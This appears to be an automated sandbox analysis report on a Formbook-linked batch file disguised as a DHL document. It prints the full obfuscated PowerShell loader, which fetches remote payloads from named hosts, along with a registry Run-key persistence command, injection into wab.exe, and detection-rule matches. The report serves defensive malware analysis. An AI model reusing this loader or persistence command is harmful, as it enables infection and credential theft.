            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDiadeHartcbundu Eror FreiHekst ProyRevaPwronrUn,ooTenot Gi
            No Snort rule has matched


            AV Detection

Source: https://tejarat-gram.com/duWJGPYoYurORY170.bin; Avira URL Cloud: Label: phishing
Source: https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.bin; Avira URL Cloud: Label: phishing
Source: rDHL_PT563857935689275783656385FV-GDS3535353.bat; ReversingLabs: Detection: 39%
Source: Yara match; File source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown; HTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP; source: wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb; source: wab.exe, wab.exe, 0000000A.00000003.2367524519.0000000024862000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB; source: powershell.exe, 00000005.00000002.2257014116.0000000006DE8000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Joe Sandbox View; IP Address: 103.211.216.55 103.211.216.55
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected:
  GET /Samsende.jpb HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: econstramedia.com
  Connection: Keep-Alive
Source: global traffic; HTTP traffic detected:
  GET /duWJGPYoYurORY170.bin HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  Host: tejarat-gram.com
  Cache-Control: no-cache
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: econstramedia.com
Source: global traffic; DNS traffic detected: DNS query: tejarat-gram.com
Source: powershell.exe, 00000002.00000002.2470375891.0000018D4C214000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://econstramedia.com
Source: powershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2470375891.0000018D4A471000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2250127984.00000000043C1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://econstramedia.c
Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://econstramedia.co
Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4BCF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4A69D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://econstramedia.com
Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://econstramedia.com/
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/S
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Sa
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Sam
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Sams
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samse
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsen
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsend
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.j
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.jp
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B88E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2470375891.0000018D4A69D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.jpb
            Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://econstramedia.com/Samsende.jpbXR
            Source: powershell.exe, 00000005.00000002.2250127984.000000000451C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2470375891.0000018D4B6E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2595043034.0000018D5A4E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2253915133.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, 0000000A.00000002.2427597487.00000000243B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/duWJGPYoYurORY170.bin
            Source: wab.exe, 0000000A.00000002.2427597487.00000000243B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tejarat-gram.com/duWJGPYoYurORY170.binArbesKoneconstramedia.com/duWJGPYoYurORY170.bin
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownHTTPS traffic detected: 103.211.216.55:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.83.114.124:443 -> 192.168.2.4:49737 version: TLS 1.2

            E-Banking Fraud

            Source: Yara match | File source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: amsi32_6988.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 6716, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6486
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 6510
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A835C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82BA0 NtEnumerateValueKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82CA0 NtQueryInformationToken
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82EA0 NtAdjustPrivilegesToken
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82FA0 NtQuerySection
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82AB0 NtWaitForSingleObject
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82DB0 NtEnumerateKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82FB0 NtResumeThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A839B0 NtGetContextThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82B80 NtQueryInformationFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82E80 NtReadVirtualMemory
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82F90 NtProtectVirtualMemory
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A83090 NtSetValueKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82BE0 NtQueryValueKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82EE0 NtQueueApcThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82FE0 NtCreateFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82AF0 NtWriteFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82BF0 NtAllocateVirtualMemory
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82CF0 NtOpenProcess
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82CC0 NtQueryVirtualMemory
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82AD0 NtReadFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82DD0 NtDelayExecution
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82D30 NtUnmapViewOfSection
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82E30 NtWriteVirtualMemory
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82F30 NtCreateSection
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82C00 NtQueryInformationProcess
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82D00 NtSetInformationFile
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82D10 NtMapViewOfSection
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A83010 NtOpenDirectoryObject
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A83D10 NtOpenProcessToken
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82B60 NtClose
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82C60 NtCreateKey
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A82F60 NtCreateProcessEx
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A83D70 NtOpenThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A84340 NtSetContextThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A84650 NtSuspendThread
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_084AACD5 LdrInitializeThunk,Sleep,NtProtectVirtualMemory
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B89BE92
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B89B0E6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD9B963464
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0425EF70
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0425F840
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0425EC28
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A19B80
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A13FD2
            Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 10_2_24A13FD5
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: amsi32_6988.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 6716, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine | Classification label: mal100.troj.evad.winBAT@18/9@2/2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Nedprioriterende200.Sig
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swyuor0u.rdj.ps1
            Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rDHL_PT563857935689275783656385FV-GDS3535353.bat" "
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6716
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6988
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
            Source: rDHL_PT563857935689275783656385FV-GDS3535353.bat | ReversingLabs: Detection: 39%
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
